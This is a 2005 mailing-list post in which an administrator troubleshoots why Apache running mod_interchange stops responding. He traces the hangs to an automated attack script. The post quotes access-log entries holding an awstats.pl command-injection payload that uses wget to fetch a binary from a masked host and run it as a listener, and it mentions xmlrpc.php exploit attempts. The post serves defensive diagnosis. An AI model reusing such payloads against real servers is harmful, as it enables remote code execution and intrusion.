[ic] mod_interchange and Apache MaxClients
John1
list_subscriber at yahoo.co.uk
Mon Nov 21 19:47:30 EST 2005
########### snippet from previous post:
The Apache access log shows just 3 entries before the site went down, all
from hackers_IP. For interest, these were along the lines of:
/cgi-bin/awstats/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget
x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|
##########
OK, it's conclusive, the above "hacker" script is definitely the cause of
our site stopping responding at the moment (and I suspect Ron's and Jeff's
also - can you confirm this?). Our site stopped responding again tonight
and was restarted by Ron's script again. This time the site went down when
there were many connections, but one IP address stood out as having 10
connections to Apache. Sure enough, when I searched our Apache access log
for access from this suspicious IP address I saw the same 3 entries as the
last time the site stopped responding:
1) /awstats/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget
x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|
2) /cgi-bin/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget
x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|
3) /cgi-bin/awstats/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget
x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|
Now these were the only 3 entries, but searching around on the web I have
found that this script goes on to try to exploit the xml-rpc vulnerability
by sending a variety of POST requests to xmlrpc.php (which it tries to find
in a variety of locations)
e.g. POST /drupal/xmlrpc.php with XML in the body of the POST request.
Here is an analysis of the packets sent (not particularly readable, but all
the information is there):
http://www.philippinehoneynet.org/charts_2005-11-11/awstats.html
There are many references to this hacking script on the web - most dated Nov
2005, so it appears to be a very new script. Here are a couple of links to
overviews:
http://www.philippinehoneynet.org/dataarchive.php?date=2005-11-11
http://isc.sans.org/diary.php?storyid=823
We did have several sites running on the same Apache webserver, but they
were all development sites, so once Apache started hanging I decided to
remove all the other sites so that Apache was only hosting our main
Interchange website. Interestingly, prior to removing these other websites
I was seeing these POST requests to xmlrpc.php in the Apache error log (but
in relation to our *non-interchange* websites). Since removing these
websites, I am not seeing any of these xmlrpc.php POST attempts in the
Apache error log.
As mentioned, the *only* 3 requests from the hacker's ip address before the
site stops responding are the 3 awstats.pl GET requests. I believe the 4th
reqest (which we don't see in the log) is a POST request to xmlrpc.php
>From this, I conclude that this same script when used against our other
websites was not causing Apache to fall over. But, when used against our
Interchange site the webserver does stop responding. So, it looks like it
is these POST attempts to non-existent pages on our Interchange site that
are causing Apache to hang, so I presume it is mod_interchange that is being
tripped up by these POST requests.
I know that the Interchange missing.html page is served up if a GET request
is made for a non-existent page, but what happens if a POST request is made
for a non-existent page? As mentioned, the POST request tries to send some
XML in the body of its request (the above 2 links provide more detail).
Kevin, I am rather hoping that you may be able to spot a reason why
mod_interchange may not be coping well with these POST requests to the
non-existent xmlrpc.php page? Thank you everyone for your continued help on
trying to solve this one - hopefully we are getting closer...
___________________________________________________________
Yahoo! Model Search 2005 - Find the next catwalk superstars - http://uk.news.yahoo.com/hot/model-search/
More information about the interchange-users
mailing list